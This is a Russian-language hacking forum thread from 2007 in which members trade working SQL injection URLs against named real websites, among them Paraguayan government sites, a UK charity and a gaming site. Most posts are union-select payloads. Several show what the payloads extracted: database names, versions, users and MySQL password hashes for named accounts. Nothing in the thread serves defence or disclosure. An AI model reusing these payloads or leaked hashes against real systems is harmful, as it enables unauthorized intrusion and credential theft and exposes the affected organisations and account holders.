SQL Инъекции

gov.py

29.09.2007, 16:42

Nea7

Участник форума

Регистрация: 08.09.2007

Сообщений: 211

С нами: 9828237

Репутация: 778

gov.py

Код:

http://www.snna.gov.py/noticia.php?id=9999999/**/union/**/select/**/1,2,concat(user(),0x3a,version(),0x3a,database()),4/*

snna@localhost:4.1.20:snna

Код:

http://www.programaumbral.gov.py/eventos_ver.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9/*

pupusaid_admin@localhost:4.0.25-standard:pupusaid_umbral

Код:

http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12/*

4.1.12 usr_seam@localhost seam

Код:

http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+2,2/*

fflores:773359240eb9a1d9

Код:

http://www.seam.gov.py/gacetillas.php?id=-1+union+select+1,password,aes_decrypt(aes_encrypt(user,0x71),0x71),4,5,6,7,8,9,10,11,12+from+mysql.user+limit+3,3/*

adm_seam:0504cab7628f6128
итд =\\\

𝕏 Twitter Reddit Telegram Копировать ссылку

29.09.2007, 19:04

fobofob

Участник форума

Регистрация: 02.08.2007

Сообщений: 242

С нами: 9881483

Репутация: 569

Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится

код:

http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*

29.09.2007, 20:38

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

С нами: 9920546

Репутация: 1796

Цитата:

Сообщение от fobofob

Впервые вижу уязвимость в html скрипте 8),сам раскрутить не смог,может у кого получится ;)

код:

http://www.vakansii.com.ua/showArticleNames.html?id=24+order+by+2/*

Там третья версия:

Код:

http://www.vakansii.com.ua/showArticleNames.html?id=24+OR 1=IF(SUBSTRING(VERSION(),1,1)=3,1,0)/*

А в третьей версии ни подзапросов ни юниона нет... Можно если комуто совсем надо только подбирать ;)

__________________

Кто я?..

29.09.2007, 19:47

Kaimi

Познавший АНТИЧАТ

Регистрация: 23.08.2007

Сообщений: 1,237

С нами: 9851426

Репутация: 1676

Цитата:

и шоб не оффтопить вот ещё она. нераскрученная
http://www.ihrc.org.uk/show.php?id=650'

Cойдет?
http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,database(),version(),user(),5,6 ,7,8,9,10,11,12/*

29.09.2007, 20:46

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

С нами: 9920546

Репутация: 1796

Код:

http://www.miga.org/sitelevel2/level2.cfm?id=1069%27

Там Oracle. Я тут не рулю...

__________________

Кто я?..

29.09.2007, 21:04

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

С нами: 10243046

Репутация: 3033

Ув. господа требуются добровольцы для апгрейта антибояна. С 300 по 323 стр. Желающие добро пожаловать в осику 480596. Спасибо

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

29.09.2007, 21:14

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

С нами: 9920546

Репутация: 1796

Код:

http://gamers.eurogamer.net/giveaways.php?id=-8 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(' ',VERSION(),DATABASE(),USER()),'1'),'1'),4,5,6,7,8,9,10,11/*

4.1.13-standard-log : eurogamer : masterwww@192.168.1.3

__________________

Кто я?..

30.09.2007, 02:11

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

С нами: 10374086

Репутация: 1745

Код:

http://www.hamo.es/es/news.php?id=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*

30.09.2007, 12:40

Sn@k3

Познавший АНТИЧАТ

Регистрация: 13.04.2006

Сообщений: 1,738

С нами: 10566621

Репутация: 1198

thinkpackaging.com Провайдер, регистрирует доменные имена и предоставляет хостинг =) п.с. хотел найти что-нибудь подходящее, дорого ибо =)

Код:

http://www.thinkpackaging.com/view_company.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,version(),22,23,24+from+company/*